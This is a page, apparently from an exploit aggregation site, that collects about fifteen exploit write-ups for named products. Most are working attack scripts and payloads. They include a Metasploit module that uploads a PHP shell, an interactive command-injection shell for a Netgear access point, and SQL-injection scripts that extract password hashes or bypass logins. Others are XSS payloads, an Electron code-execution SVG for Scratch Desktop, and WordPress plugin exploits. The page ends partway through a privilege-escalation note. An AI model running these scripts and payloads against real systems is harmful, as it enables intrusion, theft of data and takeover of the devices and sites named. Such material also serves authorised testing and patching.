HireHackking

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Lightweight facebook-styled blog authenticated remote code execution", 'Description' => %q{ This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module ], 'References' => [ ['URL', 'https://prodaft.com'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['php'], 'Arch' => [ ARCH_PHP], 'Targets' => [ ['PHP payload', { 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} } ] ], 'Privileged' => false, 'DisclosureDate' => "Dec 19 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [true, 'Blog username', 'demo']), OptString.new('PASSWORD', [true, 'Blog password', 'demo']), OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/']) ] ) end def login res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), ) cookie = res.get_cookies token = res.body.split('":"')[1].split('"')[0] # token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '') print_status("Got CSRF token: #{token}") print_status('Logging into the blog...') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), 'headers' => { 'Csrf-Token' => token, }, 'cookie' => cookie, 'data' => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}", ) if res && res.code == 200 print_good("Successfully logged in with #{datastore['USERNAME']}") json = res.get_json_document if json.empty? && json['error'] print_error('Login failed!') return nil, nil end else print_error("Login failed! Status code #{res.code}") return nil, nil end return cookie, token end def exploit cookie, token = login unless cookie || token fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed") end data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"") print_status('Uploading shell...') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'ajax.php'), 'cookie' => cookie, 'vars_get' => { 'action' => 'upload_image' }, 'headers' => { 'Csrf-Token' => token, }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, ) # print_status(res.to_s) if res && res.code == 200 json = res.get_json_document if json.empty? || !json['path'] fail_with(Failure::UnexpectedReply, 'Unexpected json response') end print_good("Shell uploaded as #{json['path']}") else print_error("Server responded with code #{res.code}") print_error("Failed to upload shell") return false end send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, json['path'])}, 3 ) print_good("Payload successfully triggered !") end end

# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06/2021 # Exploit Author: Nehal Zaman # Version: ES File Explorer v4.1.9.7.4 # Tested on: Android # CVE : CVE-2019-6447 import requests import json import ast import sys if len(sys.argv) < 3: print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]") sys.exit(1) url = 'http://' + sys.argv[2] + ':59777' cmd = sys.argv[1] cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo'] listCmds = cmds[:9] if cmd not in cmds: print("[-] WRONG COMMAND!") print("Available commands : ") print(" listFiles : List all Files.") print(" listPics : List all Pictures.") print(" listVideos : List all videos.") print(" listAudios : List all audios.") print(" listApps : List Applications installed.") print(" listAppsSystem : List System apps.") print(" listAppsPhone : List Communication related apps.") print(" listAppsSdcard : List apps on the SDCard.") print(" listAppsAll : List all Application.") print(" getFile : Download a file.") print(" getDeviceInfo : Get device info.") sys.exit(1) print("\n==================================================================") print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |") print("| Coded By : Nehal a.k.a PwnerSec |") print("==================================================================\n") header = {"Content-Type" : "application/json"} proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} def httpPost(cmd): data = json.dumps({"command":cmd}) response = requests.post(url, headers=header, data=data) return ast.literal_eval(response.text) def parse(text, keys): for dic in text: for key in keys: print(f"{key} : {dic[key]}") print('') def do_listing(cmd): response = httpPost(cmd) if len(response) == 0: keys = [] else: keys = list(response[0].keys()) parse(response, keys) if cmd in listCmds: do_listing(cmd) elif cmd == cmds[9]: if len(sys.argv) != 4: print("[+] Include file name to download.") sys.exit(1) elif sys.argv[3][0] != '/': print("[-] You need to provide full path of the file.") sys.exit(1) else: path = sys.argv[3] print("[+] Downloading file...") response = requests.get(url + path) with open('out.dat','wb') as wf: wf.write(response.content) print("[+] Done. Saved as `out.dat`.") elif cmd == cmds[10]: response = httpPost(cmd) keys = list(response.keys()) for key in keys: print(f"{key} : {response[key]}")

# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated) # Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter # Notes: The RCE doesn't need to be authenticated # Date: 26/06/2021 # Exploit Author: Bryan Leong <NobodyAtall> # IoT Device: Netgear WNAP320 Access Point # Version: WNAP320 Access Point Firmware v2.0.3 import requests import sys if(len(sys.argv) != 2): print('Must specify the IP parameter') print("eg: python3 wnap320_v2_0_3.py <IP>") sys.exit(0) host = sys.argv[1] port = 80 cmd = '' while(True): cmd = input('Shell_CMD$ ') #injecting system command part writing the command output to a output file data = { 'macAddress' : '112233445566;' + cmd + ' > ./output #', 'reginfo' : '0', 'writeData' : 'Submit' } url = 'http://' + host + '/boardDataWW.php' response = requests.post(url, data=data) if(response.ok): #read the command output result url = 'http://' + host + '/output' cmdOutput = requests.get(url) print(cmdOutput.text) #remove trace cmd = 'rm ./output' data = { 'macAddress' : '112233445566;' + cmd + ' #', 'reginfo' : '0', 'writeData' : 'Submit' } url = 'http://' + host + '/boardDataWW.php' response = requests.post(url, data=data) else: print('[!] No response from the server.')

# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) # Date: 06/05/2021 # Exploit Author: CAPTAIN_HOOK # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira/download/data-center # Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 # Tested on: ANY # CVE : CVE-2021-26078 Description: The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability *Fixed versions:* - 8.5.14 - 8.13.6 - 8.16.1 - 8.17.0 POC: - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22 Your XSS Will be triggered immediately. Reference: https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21

# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration # Author: Dolev Farhi # Date: 2021-05-13 # Vendor Homepage: https://superset.apache.org/ # Version: 1.1.0 # Tested on: Ubuntu import sys import requests import time scheme = 'http' host = '192.168.1.1' port = 8080 # change with your wordlist usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset'] url = '{}://{}:{}'.format(scheme, host, port) login_endpoint = '/login/' session = requests.Session() def get_csrf(): token = None r = session.get(url + login_endpoint, verify=False) for line in r.text.splitlines(): if 'csrf_token' in line: try: token = line.strip().split('"')[-2] except: pass return token csrf_token = get_csrf() if not csrf_token: print('Could not obtain CSRF token, the exploit will likely fail.') sys.exit(1) data = { 'csrf_token':csrf_token, 'username':'', 'password':'abc' } attempts = {} found = False for user in usernames: start = time.time() data['username'] = user r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True) roundtrip = time.time() - start attempts["%.4f" % roundtrip] = user print('[!] Accounts existence probability is sorted from high to low') count = 0 for key in sorted(attempts, reverse=True): count += 1 print("%s. %s (timing: %s)" % (count, attempts[key], key))

# Exploit Title: phpAbook 0.9i - SQL Injection # Date: 2021-06-29 # Vendor Homepage: http://sourceforge.net/projects/phpabook/ # Exploit Author: Said Cortes, Alejandro Perez # Version: v0.9i # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. import requests import argparse import string import sys def exploit(session,host): print("Starting Exploit\nSearching Admin Hash...") passwordhash = '' for i in range(1,33): charset = string.digits + string.ascii_lowercase for letter in charset: burp0_url = f"{host}/index.php" burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"} try: session.post(burp0_url, data=burp0_data, timeout=1) except requests.Timeout: passwordhash += letter continue print("admin:"+passwordhash) if __name__ == "__main__" : session = requests.session() parser = argparse.ArgumentParser() parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True) arg = parser.parse_args() exploit(session,arg.url)

# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi) # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date 30.06.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /Online_voting_system/admin/ HTTP/1.1 Host: localhost Content-Length: 50 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/Online_voting_system/admin/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a Connection: close UserName=admin&Password=%27+or+%27%27%3D%27&Login= ########### # Payload # ########### UserName=admin Password=' or ''='

# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) # Date: 06/30/2021 # Exploit Author: Murat DEMIRCI (butterflyhunt3r) # Vendor Homepage: https://www.codester.com/ # Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : http://test.com/PATH/signin # Username : anything # Password : ' or '1'='1

# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) # Date: 30-06-2021 # Exploit Author: Barış Yıldızoğlu # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 # Description: Almost all inputs contain Stored XSS on the website Request: POST /Trafic/save-reported.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 168 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/Trafic/report-offence.php Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo Upgrade-Insecure-Requests: 1 offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload here}&name={Payload here}&address={Payload here}&gender={Payload here}&officer_reporting={Payload here}&offence={Payload here} # Steps to Reproduce: [1.] Login to the system [+] username=Torrahclef&pass=yemiyemi [2.] Go to the Report Offense page [3.] Send the request above with the Stored XSS payload [4.] Dashboard and Offense list pages will be triggered

# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi # Date: 01/07/2021 # Exploit Author: Audencia Business SCHOOL # Vendor Homepage: http://www.vianeos.com/en/home-vianeos/ # Software Link: http://www.vianeos.com/en/octopus/ # Version: > V5 # Tested on: Fedora / Apache2 / MariaDB Octopus V5 SQLi The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow : ``` Parameter: login_user (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1 ```

# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) # Date 30.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.xcloner.com/ # Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip # Version: 4.2.1 - 4.2.12 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-35948 # CWE: CWE-732 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md ''' Description: An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, for example. Alternatively, an attacker could create an exploit chain to obtain a database dump. ''' ''' Banner: ''' banner = """ ##### # # ####### ##### ### ##### ### ##### ####### ##### # ##### # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # ##### # # # # # # # # # # # # # ####### # # # # # # # # # # # # # # # # # # # # # # ##### # ####### ####### ### ####### ### ##### ##### ##### # ##### by @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ajax_cmd = input('[*] Ajax Command to execute: ') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header= auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Exploit: ''' url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup" header = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357", "Connection": "close" } # Body: body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd) exploit = session.post(url_exploit, headers=header, data=body) print('') print(exploit.text) print('')

# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated) # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date 30.06.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /Online_voting_system/admin/save_candidate.php HTTP/1.1 Host: localhost Content-Length: 1253 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/Online_voting_system/admin/new_candidate.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a Connection: close ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="user_name" admin ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rfirstname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rlastname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rgender" Male ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="ryear" 1st year ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rmname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rposition" Governor ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="party" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="image"; filename="test.php" Content-Type: application/octet-stream <?php echo exec("whoami"); ?> ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="save" ------WebKitFormBoundary4G9QRpniTS7gPVqW-- ######## # Note # ######## Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/

# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) # Date: 07-01-2021 # Exploit Author: Tyler Butler # Vendor Homepage: https://www.akcp.com/ # Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/ # Advisory: https://tbutler.org/2021/06/28/cve-2021-35956 # Version: < SP480-20210624 # CVE: CVE-2021-35956 # Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. 1) Stored Cross-Site Scripting via System Settings POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save 2) Stored Cross-Site Scripting via Email Settings POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save 3) Stored Cross-Site Scripting via Sensor Description POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close _WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save

# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) # Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning) # Date: 2021-06-18 # Exploit Author: Stig Magnus Baugstø # Vendor Homepage: https://scratch.mit.edu/ # Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe # Version: 3.10.2 # Tested on: Windows 10 x64, but should be platform independent. # CVE: CVE-2020-7750 Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008 CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/ You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" /> </svg> The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way. Example of regular cross-site scripting (XSS): <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image href="doesNotExist.png" onerror="alert('Pwned!')" /> </svg> The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE): <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" /> </svg> The example above launches cmd.exe (Command Prompt) on Windows. For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/ Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.

# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) # Date 01.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://webnus.net/modern-events-calendar/ # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip # Version: Before 5.16.5 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24146 # CWE: CWE-863, CWE-284 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md ''' Description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. ''' ''' Banner: ''' banner = """ _______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____ / ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/ / / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \ / /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ / \____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/ * WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse import csv ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH ''' Exploit: ''' print('') print('[+] Exported Data: ') print('') exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv' answer = requests.get(exploit_url) decoded_content = answer.content.decode('utf-8') cr = csv.reader(decoded_content.splitlines(), delimiter=',') my_list = list(cr) for row in my_list: print(row)

# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control # Date: 2021-07-01 # Author: Andrea Intilangelo # Vendor Homepage: http://nica.it - http://winwastenet.com # Version: 1.0.6183.16475 # Tested on: Windows 10 Pro x64 - 20H2 and 21H1 # CVE: CVE-2021-34110 WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges. (1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" (2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software. (3) Details: C:\Users\user>sc qc winwasteservice [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: winwasteservice TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : WinwasteService DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG" C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\" C:\Program Files (x86)\WW.NET\WW.PROG 